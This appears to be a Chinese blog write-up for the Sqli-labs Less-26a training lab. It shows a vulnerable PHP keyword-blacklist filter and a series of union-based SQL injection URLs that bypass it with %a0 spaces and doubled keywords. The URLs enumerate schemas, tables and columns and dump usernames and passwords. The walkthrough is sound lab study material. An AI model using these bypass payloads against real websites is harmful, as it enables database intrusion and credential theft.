zoukankan      html  css  js  c++  java

  • Sqli-labs Less-26a 绕过 or、and、注释符、空格、斜杠过滤 union注入

    关键代码

    function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[/*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[/\\]/',"", $id);        //Strip out slashes
    return $id;
}
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
//print_r(mysql_error());

    这关与less26的区别在于,sql语句添加了一个括号,同时在sql语句执行抛出错误后并不在前台页面输出。所以我们排除报错注入,这里利用union注入。

    我们构造payload:

    http://127.0.0.1/sqllib/Less-26a/?id=100')union%a0select%a01,2,3||('1

    Explain:基础与less26一致,我们直接用 ') 闭合前面的,然后跟上自己构造的注入语句即可。最后利用('1 进行闭合即可。

    1、爆当前数据库

    http://127.0.0.1/sql/Less-26a/?id=100')union select 1,database(),('3

    将空格替换为%a0

    http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,database(),('3

    2、爆数据库

    http://127.0.0.1/sql/Less-26a/?id=100')union select 1,(select group_concat(schema_name) from information_schema.schemata),('3

    将空格替换为%a0,将information_schema替换为infoorrmation_schema

    http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(schema_name)%a0from%a0infoorrmation_schema.schemata),('3

    3、爆数据表

    http://127.0.0.1/sql/Less-26a/?id=100')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),('3

    将空格替换为%a0,将information_schema替换为infoorrmation_schema

    http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema='security'),('3

    4、爆数据列

    http://127.0.0.1/sql/Less-26a/?id=100')union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),('3

    将空格替换为%a0,将information_schema替换为infoorrmation_schema,将and替换为aandnd

    http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(column_name)%a0from%a0infoorrmation_schema.columns%a0where%a0table_schema='security'%a0aandnd%a0table_name='users'),('3

    5、爆内容

    http://127.0.0.1/sql/Less-26a/?id=100')union select 1,(select group_concat(username,0x3a,password) from users),('3

    将空格替换为%a0,将password替换为passwoorrd

    http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(username,0x3a,passwoorrd)%a0from%a0security.users),('3
  • 相关阅读:
    「日常训练」Single-use Stones (CFR476D2D)
    「日常训练」Greedy Arkady (CFR476D2C)
    「Haskell 学习」二 类型和函数(上)
    「学习记录」《数值分析》第二章计算实习题(Python语言)
    「日常训练」Alena And The Heater (CFR466D2D)
    Dubbo 消费者
    Dubbo 暴露服务
    Rpc
    git fail to push some refs....
    Spring Cloud (6)config 客户端配置 与GitHub通信
  • 原文地址:https://www.cnblogs.com/zhengna/p/12655081.html
Copyright © 2011-2022 走看看